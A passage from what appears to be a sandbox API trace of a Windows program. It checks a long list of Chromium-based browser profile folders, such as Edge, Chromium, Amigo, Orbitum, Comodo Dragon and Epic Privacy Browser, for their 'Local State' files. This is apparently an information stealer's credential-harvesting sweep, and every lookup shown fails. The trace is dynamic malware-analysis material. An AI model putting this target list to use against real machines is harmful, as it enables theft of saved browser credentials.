"c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.726] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.726] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.726] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.726] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.726] wsprintfA (in: param_1=0x198474, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned 67 [0174.726] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome sxs\\user data\\*.*"), lpFindFileData=0x19832c | out: lpFindFileData=0x19832c*(dwFileAttributes=0x730055, ftCreationTime.dwLowDateTime=0x720065, ftCreationTime.dwHighDateTime=0x440020, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x5c0061, ftLastWriteTime.dwLowDateTime=0x6f004c, ftLastWriteTime.dwHighDateTime=0x610063, nFileSizeHigh=0x20006c, nFileSizeLow=0x740053, dwReserved0=0x740061, dwReserved1=0x65, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.728] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.728] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0174.728] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data" [0174.728] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" [0174.728] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\local state")) returned 0xffffffff [0174.728] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*") returned 56 [0174.729] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chromium\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.732] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.732] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0174.732] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data" [0174.732] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" [0174.733] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\local state")) returned 0xffffffff [0174.733] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*") returned 62 [0174.733] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Edge\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\edge\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610044, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x4c005c, ftLastAccessTime.dwLowDateTime=0x63006f, ftLastAccessTime.dwHighDateTime=0x6c0061, ftLastWriteTime.dwLowDateTime=0x530020, ftLastWriteTime.dwHighDateTime=0x610074, nFileSizeHigh=0x650074, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.734] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.734] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0174.734] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" [0174.734] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" [0174.734] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\local state")) returned 0xffffffff [0174.734] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*") returned 54 [0174.734] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x6c0061, ftCreationTime.dwLowDateTime=0x530020, ftCreationTime.dwHighDateTime=0x610074, ftLastAccessTime.dwLowDateTime=0x650074, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.736] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.736] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0174.736] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0174.736] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" [0174.736] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data\\local state")) returned 0xffffffff [0174.736] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*") returned 53 [0174.736] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x20006c, ftCreationTime.dwLowDateTime=0x740053, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x65, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.737] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.737] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0174.737] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data" [0174.738] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" [0174.738] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\local state")) returned 0xffffffff [0174.738] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*") returned 53 [0174.738] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torch\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x20006c, ftCreationTime.dwLowDateTime=0x740053, ftCreationTime.dwHighDateTime=0x740061, ftLastAccessTime.dwLowDateTime=0x65, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.739] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.739] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0174.739] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" [0174.739] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" [0174.739] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\local state")) returned 0xffffffff [0174.739] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*") returned 55 [0174.739] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.740] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.741] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0174.741] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data" [0174.741] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" [0174.741] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\local state")) returned 0xffffffff [0174.741] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*") returned 61 [0174.741] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x740061, ftCreationTime.dwLowDateTime=0x5c0061, ftCreationTime.dwHighDateTime=0x6f004c, ftLastAccessTime.dwLowDateTime=0x610063, ftLastAccessTime.dwHighDateTime=0x20006c, ftLastWriteTime.dwLowDateTime=0x740053, ftLastWriteTime.dwHighDateTime=0x740061, nFileSizeHigh=0x65, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.742] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.742] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0174.742] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data" [0174.742] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" [0174.742] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\local state")) returned 0xffffffff [0174.742] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*") returned 56 [0174.742] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\nichrome\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.744] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.744] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0174.744] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users" [0174.744] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" [0174.744] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon5\\users\\local state")) returned 0xffffffff [0174.744] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*") returned 52 [0174.744] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Maxthon5\\Users\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\maxthon5\\users\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x530020, ftCreationTime.dwLowDateTime=0x610074, ftCreationTime.dwHighDateTime=0x650074, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0174.745] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.745] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0174.745] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data" [0174.745] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" [0174.791] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\user data\\local state")) returned 0xffffffff [0174.794] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*") returned 55 [0174.794] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\user data\\*"), lpFindFileData=0x198330 | out: lpFindFileData=0x198330*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ù\x01")) returned 0xffffffff [0174.795] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x1986b4 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0174.795] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0174.795] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data" [0174.795] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" [0174.795] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\local state")) returned 0xffffffff [0174.795] wsprintfA (in: param_1=0x198478, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*") returned 68 [0174.795] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\*"), lpFindFileData=0x198330 | out: 